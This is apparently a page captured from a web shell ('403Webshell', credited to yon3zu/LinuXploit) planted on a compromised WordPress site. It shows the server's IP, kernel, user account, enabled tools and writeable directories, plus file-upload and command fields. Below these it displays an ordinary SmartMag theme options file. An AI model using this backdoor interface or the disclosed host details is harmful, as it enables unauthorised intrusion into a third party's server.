403Webshell
Server IP : 104.21.93.192  /  Your IP : 216.73.216.73
Web Server : LiteSpeed
System : Linux premium900.web-hosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : redwjova ( 1790)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/redwjova/clevorio.com/wp-content/themes/smart-mag/admin/options/listings/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/redwjova/clevorio.com/wp-content/themes/smart-mag/admin/options/listings/overlay.php
<?php
/**
 * Fields for Overlay loops.
 */
$fields = [];
\Bunyad\Util\repeat_options(
	$_common['tpl_listing'],
	[
		'overlay' => [
			'replacements' => [
				'{selector}' => '.loop-overlay',
			],
			'skip' => [
				'loop_{key}_excerpts',
				'loop_{key}_excerpt_length',
				'loop_{key}_read_more',
				'loop_{key}_separators',
				'loop_{key}_content_center',
				'css_loop_{key}_media_margins',
				'css_loop_{key}_content_pad'
			]
		]
	],
	$fields,
	['replace_in' => ['css', 'group', 'context']]
);

$fields[] = [
	'css_loop_overlay_padding' => [
		'label'       => esc_html__('Overlay Paddings', 'bunyad-admin'),
		'type'        => 'dimensions',
		'value'       => [],
		'devices'     => true,
		'css'         => [
			'.loop-overlay .content' => ['dimensions' => 'padding']
		]
	],
];

$fields[] = [
	'loop_overlay_title_style' => [
		'label'       => esc_html__('Post Titles Style', 'bunyad-admin'),
		'type'        => 'select',
		'value'       => 'normal',
		'options'     => $_common['post_title_styles'],
		'css'         => [
			'.loop-overlay .content' => ['dimensions' => 'padding']
		]
	],
];

return $fields;

Youez - 2016 - github.com/yon3zu
LinuXploit